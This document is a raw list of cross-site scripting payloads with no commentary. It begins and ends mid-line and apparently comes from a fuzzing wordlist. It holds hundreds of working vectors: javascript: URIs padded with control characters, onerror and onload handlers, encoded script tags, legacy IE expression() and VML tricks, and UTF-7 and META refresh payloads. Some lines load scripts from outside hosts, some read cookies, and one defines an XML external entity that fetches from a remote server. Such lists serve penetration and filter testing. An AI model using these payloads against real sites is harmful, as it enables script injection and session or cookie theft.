style=\"x:\\x00expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE2\\x80\\x8Bexpression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE2\\x80\\x86expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE2\\x80\\x85expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE2\\x80\\x82expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\x0Bexpression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE2\\x80\\x81expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE2\\x80\\x83expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE2\\x80\\x89expression(javascript:alert(1)\">DEF\n<a href=\"\\x0Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x0Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xC2\\xA0javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x05javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE1\\xA0\\x8Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x18javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x11javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\x88javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\x89javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x17javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x03javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x0Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x1Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x00javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x10javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\x82javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x20javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x13javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x09javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\x8Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x14javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x19javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\xAFjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x1Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\x81javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x1Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\x87javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x07javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE1\\x9A\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\x83javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x04javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x01javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x08javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\x84javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\x86javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE3\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x12javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x0Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x0Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x0Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x15javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\xA8javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x16javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x02javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x1Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x06javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\xA9javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x80\\x85javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x1Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\xE2\\x81\\x9Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"\\x1Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"javascript\\x00:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"javascript\\x3A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"javascript\\x09:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"javascript\\x0D:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n<a href=\"javascript\\x0A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>\n`\"'><img src=xxx:x \\x0Aonerror=javascript:alert(1)>\n`\"'><img src=xxx:x \\x22onerror=javascript:alert(1)>\n`\"'><img src=xxx:x \\x0Bonerror=javascript:alert(1)>\n`\"'><img src=xxx:x \\x0Donerror=javascript:alert(1)>\n`\"'><img src=xxx:x \\x2Fonerror=javascript:alert(1)>\n`\"'><img src=xxx:x \\x09onerror=javascript:alert(1)>\n`\"'><img src=xxx:x \\x0Conerror=javascript:alert(1)>\n`\"'><img src=xxx:x \\x00onerror=javascript:alert(1)>\n`\"'><img src=xxx:x \\x27onerror=javascript:alert(1)>\n`\"'><img src=xxx:x \\x20onerror=javascript:alert(1)>\n\"`'><script>\\x3Bjavascript:alert(1)</script>\n\"`'><script>\\x0Djavascript:alert(1)</script>\n\"`'><script>\\xEF\\xBB\\xBFjavascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\x81javascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\x84javascript:alert(1)</script>\n\"`'><script>\\xE3\\x80\\x80javascript:alert(1)</script>\n\"`'><script>\\x09javascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\x89javascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\x85javascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\x88javascript:alert(1)</script>\n\"`'><script>\\x00javascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\xA8javascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\x8Ajavascript:alert(1)</script>\n\"`'><script>\\xE1\\x9A\\x80javascript:alert(1)</script>\n\"`'><script>\\x0Cjavascript:alert(1)</script>\n\"`'><script>\\x2Bjavascript:alert(1)</script>\n\"`'><script>\\xF0\\x90\\x96\\x9Ajavascript:alert(1)</script>\n\"`'><script>-javascript:alert(1)</script>\n\"`'><script>\\x0Ajavascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\xAFjavascript:alert(1)</script>\n\"`'><script>\\x7Ejavascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\x87javascript:alert(1)</script>\n\"`'><script>\\xE2\\x81\\x9Fjavascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\xA9javascript:alert(1)</script>\n\"`'><script>\\xC2\\x85javascript:alert(1)</script>\n\"`'><script>\\xEF\\xBF\\xAEjavascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\x83javascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\x8Bjavascript:alert(1)</script>\n\"`'><script>\\xEF\\xBF\\xBEjavascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\x80javascript:alert(1)</script>\n\"`'><script>\\x21javascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\x82javascript:alert(1)</script>\n\"`'><script>\\xE2\\x80\\x86javascript:alert(1)</script>\n\"`'><script>\\xE1\\xA0\\x8Ejavascript:alert(1)</script>\n\"`'><script>\\x0Bjavascript:alert(1)</script>\n\"`'><script>\\x20javascript:alert(1)</script>\n\"`'><script>\\xC2\\xA0javascript:alert(1)</script>\n<img \\x00src=x onerror=\"alert(1)\">\n<img \\x47src=x onerror=\"javascript:alert(1)\">\n<img \\x11src=x onerror=\"javascript:alert(1)\">\n<img \\x12src=x onerror=\"javascript:alert(1)\">\n<img\\x47src=x onerror=\"javascript:alert(1)\">\n<img\\x10src=x onerror=\"javascript:alert(1)\">\n<img\\x13src=x onerror=\"javascript:alert(1)\">\n<img\\x32src=x onerror=\"javascript:alert(1)\">\n<img\\x47src=x onerror=\"javascript:alert(1)\">\n<img\\x11src=x onerror=\"javascript:alert(1)\">\n<img \\x47src=x onerror=\"javascript:alert(1)\">\n<img \\x34src=x onerror=\"javascript:alert(1)\">\n<img \\x39src=x onerror=\"javascript:alert(1)\">\n<img \\x00src=x onerror=\"javascript:alert(1)\">\n<img src\\x09=x onerror=\"javascript:alert(1)\">\n<img src\\x10=x onerror=\"javascript:alert(1)\">\n<img src\\x13=x onerror=\"javascript:alert(1)\">\n<img src\\x32=x onerror=\"javascript:alert(1)\">\n<img src\\x12=x onerror=\"javascript:alert(1)\">\n<img src\\x11=x onerror=\"javascript:alert(1)\">\n<img src\\x00=x onerror=\"javascript:alert(1)\">\n<img src\\x47=x onerror=\"javascript:alert(1)\">\n<img src=x\\x09onerror=\"javascript:alert(1)\">\n<img src=x\\x10onerror=\"javascript:alert(1)\">\n<img src=x\\x11onerror=\"javascript:alert(1)\">\n<img src=x\\x12onerror=\"javascript:alert(1)\">\n<img src=x\\x13onerror=\"javascript:alert(1)\">\n<img[a][b][c]src[d]=x[e]onerror=[f]\"alert(1)\">\n<img src=x onerror=\\x09\"javascript:alert(1)\">\n<img src=x onerror=\\x10\"javascript:alert(1)\">\n<img src=x onerror=\\x11\"javascript:alert(1)\">\n<img src=x onerror=\\x12\"javascript:alert(1)\">\n<img src=x onerror=\\x32\"javascript:alert(1)\">\n<img src=x onerror=\\x00\"javascript:alert(1)\">\n<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>\n<img src=\"x` `<script>javascript:alert(1)</script>\"` `>\n<img src onerror /\" '\"= alt=javascript:alert(1)//\">\n<title onpropertychange=javascript:alert(1)></title><title title=>\n<a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=x:x onerror=javascript:alert(1)></a>\">\n<!--[if]><script>javascript:alert(1)</script -->\n<!--[if<img src=x onerror=javascript:alert(1)//]> -->\n<script src=\"/\\%(jscript)s\"></script>\n<script src=\"\\\\%(jscript)s\"></script>\n<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">\n<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>\n<IMG SRC=# onmouseover=\"alert('xxs')\">\n<IMG SRC= onmouseover=\"alert('xxs')\">\n<IMG onmouseover=\"alert('xxs')\">\n<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>\n<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>\n<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>\n<IMG SRC=\"jav   ascript:alert('XSS');\">\n<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">\n<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">\n<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">\nperl -e 'print \"<IMG SRC=java\\0script:alert(\\\"XSS\\\")>\";' > out\n<IMG SRC=\" &#14;  javascript:alert('XSS');\">\n<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>\n<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n<<SCRIPT>alert(\"XSS\");//<</SCRIPT>\n<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >\n<SCRIPT SRC=//ha.ckers.org/.j>\n<IMG SRC=\"javascript:alert('XSS')\"\n<iframe src=http://ha.ckers.org/scriptlet.html <\n\\\";alert('XSS');//\n<u oncopy=alert()> Copy me</u>\n<i onwheel=alert(1)> Scroll over me </i>\n<plaintext>\nhttp://a/%%30%30\n</textarea><script>alert(123)</script>\n<!><!----><?></>\n<![\n<%%%>\n<%=\tputs\t\"test\"\t%> \n\">    \"><iframe src=http://xss.cx onload=confirm(5) <<iframe src=a>    \"><iframe src=http://xss.cx onload=confirm(8) <\n% E2% 88% 80% E3% B8% 80% E3% B0% 80script% E3% B8% 80confirm% 281% 29% E3% B0 % 80 80/script% E3% B8%\n<!-- Hello -- world > <SCRIPT>confirm(1)</SCRIPT> -->\n<!-- IE 5-8 standards mode --><a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=xx:x onerror=alert(1)></a>\"><!-- IE 5-9 standards mode --><!a foo=x=`y><img alt=\"`><img src=xx:x onerror=alert(2)//\"><?a foo=x=`y><img alt=\"`><img src=xx:x onerror=alert(3)//\">\n<!-- IE 5-9 --><div id=d><x xmlns=\"><iframe onload=alert(1)\"></div><script>d.innerHTML+='';</script><!-- IE 10 in IE5-9 Standards mode --><div id=d><x xmlns='\"><iframe onload=alert(2)//'></div><script>d.innerHTML+='';</script>\n<!-- IE 6-8 --><x '=\"foo\"><x foo='><img src=x onerror=alert(1)//'><!-- IE 6-9 --><! '=\"foo\"><x foo='><img src=x onerror=alert(2)//'><? '=\"foo\"><x foo='><img src=x onerror=alert(3)//'>\n<!-- Up to Opera 10.63 --><div style=content:url(test2.svg)></div><!-- Up to Opera 11.64 - see link below --><!-- Up to Opera 12.x --><div style=\"background:url(test5.svg)\">PRESS ENTER</div>\n<! XSS=\"><img src=xx:x onerror=confirm(1)//\">\n<% a=%&gt&lt;iframe/onload=alert(1)//>\n\"; ||confirm('XSS') || \"\n<? echo('<SCR)';\n<? foo=\"><script>confirm(1)</script>\">\n\"/> <img src='aaa' onerror=confirm(document.domain)>\n/> <img src='aaa' onerror=confirm(document.domain)>\n<!-- `<img/src=xx:xx onerror=alert(1)//--!>\n<!-- --!><input value=\"--><body/onload=`confirm(4)//`\">\n<!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> <a href=javascript*chr*:confirm(*num*)>*num*</a>\n//|\\\\ <script //|\\\\ src='http://xss.cx/xss.js'> //|\\\\ </script //|\\\\\n<// style=x:expression\\28write(1)\\29>\n<!-- up to Opera 11.52, FF 3.6.28 --><![><img src=\"]><img src=x onerror=alert(1)//\"><!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+  --><svg><![CDATA[><image xlink:href=\"]]><img src=xx:x onerror=alert(2)//\"></svg>\n&#0000060\n&#0000060;\n&#0000062\n&#0000062;\n&#000060\n&#000060;\n&#000062\n&#000062;\n&#00060\n&#00060;\n&#00062\n&#00062;\n&#0060\n&#0060;\n&#0062\n&#0062;\n&#00;</form><input type&#61;\"date\" onfocus=\"confirm(1)\">\n<%00/title>\n&#060\n&#060;\n&#062\n&#062;\n0?<script>Worker(\"#\").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))\n1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>\n1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2)  attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=alert(1)&gt;>\n1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=alert(1)&gt;`>\n~~)1(trela+tpircsavaj'.split('').reverse().join('').split('~').join(String.fromCharCode(47)).split('+').join(String.fromCharCode(58))).concat('\n1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>\n%2522%253E%253Csvg%2520onload%3D%2522confirm(7)%2522%253E\n%253Cs%26%2399%3Bri%26%23112%3Bt%2520s%26%23114%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%253E\n%253Cs%26%23x63%3Bri%26%23x70%3Bt%2520s%26%23x72%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%253E\n%253Cscript%2520src%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fscript%253E\n\"%25prompt(9)%25\"\n\"%26%26prompt(9)%26%26\"\n%26lt%3bscript>\n\"%26prompt(9)%26\"\n%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E\n<3 </3\n&#34;&#62;<h1/onmouseover='\\u0061lert(1)'>%00\n&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'\n%3C\n%3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cs%26%2399%3Bri%26%23112%3Bt%2520s%26%23114%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E\n%3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cs%26%23x63%3Bri%26%23x70%3Bt%2520s%26%23x72%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E\n%3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cscript%2520src%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fscript%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E\n%3Cs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%20s%26%23114%3B%26%2399%3B%3Dht%26%23116%3Bp%3A%2F%2Fx%26%23116%3Bxs%26%2399%3B.cx%2Fxss%2Ejs%3E%3C%2Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%3E\n%3Cs%26%2399%3Bri%26%23112%3Bt%20s%26%23114%3Bc%3D%2F%2Fxy%2Ehn%2Fa%2Ejs%20%3E%3C%2Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%3E\n%3Cs%26%23x63%3Bri%26%23x70%3Bt%20s%26%23x72%3Bc%3D%2F%2Fxy%2Ehn%2Fa%2Ejs%20%3E%3C%2Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%3E\n%3Cs%26%23x63%3Bri%26%23x70%3Bt%20s%26%23x72%3Bc%3Dhttp%3A%2F%2Fxs%26%23s63%3B.cx%2Fxss%2Ejs%3E%3C%2Fs%26%23x63%3Bri%26%23x70%3Bt%3E\n%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{confirm%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E\n%3E\n[4076*A]<img src=\"x\" alt=\"[0x8F]\" test=\" onerror=confirm(1)//\">\n&#60\n&#60;\n&#62\n&#62;\n<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74>\n<A HREF=\"javascript&#09;:alert(1)\">\n<A \"\"\"><IMG SRC=\"javascript:confirm(1)\">\n[A]<? foo=\"><script>alert(1)</script>\"><! foo=\"><script>alert(1)</script>\"></ foo=\"><script>alert(1)</script>\">[B]<? foo=\"><x foo='?><script>alert(1)</script>'>\">[C]<! foo=\"[[[x]]\"><x foo=\"]foo><script>alert(1)</script>\">[D]<% foo><x foo=\"%><script>alert(1)</script>\">\n\"'`>ABC<div style=\"font-family:'foo'*chr*x:expression(log(*num*));/*';\">DEF\n\"'`>ABC<div style=\"font-family:'foo*chr*;x:expression(log(*num*));/*';\">DEF\n+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);\n<A/HREF=\"javascript:confirm(1)\">\n<B <SCRIPT>confirm(1)</SCRIPT>>\n<BASE HREF=\"javascript:confirm('XSS');//\">\n<BGSOUND SRC=\"javascript:confirm('XSS');\">\n<BODY BACKGROUND=\"javascript:confirm('XSS')\">\n<BODY ONLOAD=confirm('XSS')>\n<BR SIZE=\"&{confirm('XSS')}\">\n<B=\"<SCRIPT>confirm(1)</SCRIPT>\">\n<![C b=\"c\">\n%CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert(1)%EF%BC%9E\n<![CDAĹĹ@\n<![CDAT<!\n<![<CDATA[C%Ada b=\"c\":]]]>\n<![CDb m=\"c\">\n<DIV STYLE=\"background-image: url(&#1;javascript:confirm(5))\">\n<DIV STYLE=\"background-image: url(javascript:confirm(5))\">\n<DIV STYLE=\"width: expression(confirm(5));\">\n<!DOCTY\n<!DOCTY.\n<!DOCTYPE x [\t<!ATTLIST img xmlns CDATA \"http://www.w3.org/1999/xhtml\" src CDATA \"xx:x\" onerror CDATA \"alert(1)\" onload CDATA \"alert(2)\">]><img />\n<!DOCTYPE x[<!ENTITY x SYSTEM \"http://html5sec.org/test.xxe\">]><y>&x;</y>\n%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80confirm(1)%E3%B0%80/script%E3%B8%80\n<FRAMESET><FRAME RC=\"\"+\"javascript:confirm(5);\"></FRAMESET>\n<FRAMESET><FRAME SRC=\"javascript:confirm(5);\"></FRAMESET>\n&GT\n&GT;\n<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-confirm(5);+ADw-/SCRIPT+AD4-\n<HTML><BODY>\n<IFRAME SRC=\"javascript:confirm(5);\"></IFRAME>\n<IFRAME%20src='javascript:confirm%26%23x25;281)'>\n<IFRAME/SRC=DATA:TEXT/HTML;BASE64,ICA8U0NSSVBUIC8NU1JDPSINSFRUUFM6DS8NDS8NSEVJREVSSS5DSC96DSINID4NPC9TQ1JJUFQNDT5>\n<![><IMG ALT=\"]><SCRIPT>confirm(1)</SCRIPT>\">\n<IMG ALT=\"><SCRIPT>confirm(1)</SCRIPT>\"(EOF)\n<IMG DYNSRC=\"javascript:confirm(document.location)\">\n<IMG LOWSRC=\"javascript:confirm(document.location)\">\n<IMG SRC=\" &#14;  javascript:confirm(document.location);\">\n<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>\n<IMG SRC=JaVaScRiPt:confirm(document.location)>\n<IMG SRC=JaVaScRiPt:confirm(&quot;XSS<WBR>&quot;)>\n<IMG SRC=JaVaScRiPt:prompt(document.location)> \n<IMG SRC=\"jav\tascript:confirm(document.location);\">\n<IMG SRC=java%00script:confirm(document.location)>\n<IMG SRC=`javascript:confirm(1)`>\n<IMG SRC=javascript:confirm(String.fromCharCode(88,83,83))>\n<IMG SRC=`javascript:confirm(document.cookie)`>\n<IMG SRC=\"javascript:confirm(document.location)\"\n<IMG SRC=\"javascript:confirm(document.location);\">\n<IMG SRC=javascript:confirm(document.location)>\n<IMG SRC=javascript:confirm(&quot;XSS&quot;)>\n<IMG SRC=javascript:prompt(document.location)>\n<IMG SRC=\"jav&#x09;ascript:confirm(<WBR>document.location);\">\n<IMG SRC=\"jav&#x09;ascript:confirm(document.location);\">\n<IMG SRC=\"jav&#x0A;ascript:confirm(<WBR>document.location);\">\n<IMG SRC=\"jav&#x0A;ascript:confirm(document.location);\">\n<IMG SRC=\"jav&#x0D;ascript:confirm(<WBR>document.location);\">\n<IMG SRC=\"jav&#x0D;ascript:confirm(document.location);\">\n<IMG SRC=\"livescript:[code]\">\n<IMG SRC=\"mocha:[code]\">\n<IMG SRC='vbscript:msgbox(document.location)'>\n<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>\n<IMG STYLE=\"xss:expr/*XSS*/ession(confirm(document.location))\">\n<IMG onmouseover =confirm(1)>\n<IMG%0aSRC%0a=%0a\"%0aj%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0at%0a:%0aa%0al%0ae%0ar%0at%0a(%0a'%0aX%0aS%0aS%0a'%0a)%0a\"%0a>\n<IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041>\n<IMGSRC=&#106;&#97;&#118;&#97;&<WBR>#115;&#99;&#114;&#105;&#112;&<WBR>#116;&#58;&#97;&#108;&#101;&<WBR>#114;&#116;&#40;&#39;&#88;&#83<WBR>;&#83;&#39;&#41>\n<IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28&<WBR>#x27&#x58&#x53&#x53&#x27&#x29>\n<INPUT TYPE=\"IMAGE\" SRC=\"javascript:confirm(document.location);\">\n<LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER>\n<LINK REL=\"stylesheet\" HREF=\"http://xss.cx/xss.css\">\n<LINK REL=\"stylesheet\" HREF=\"javascript:confirm(document.location);\">\n&LT\n&LT;\n<META HTTP-EQUIV=\"Link\" Content=\"<http://xss.cx/xss.css>; REL=stylesheet\">\n<META HTTP-EQUIV=\"Link\" Content=\"<javascript:confirm(document.location)>; REL=stylesheet\">\n<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;SCRIPT&gt;confirm(document.location)&lt;/SCRIPT&gt;\">\n<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:confirm(document.location);\">\n<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">\n<META HTTP-EQUIV=\"refresh\" 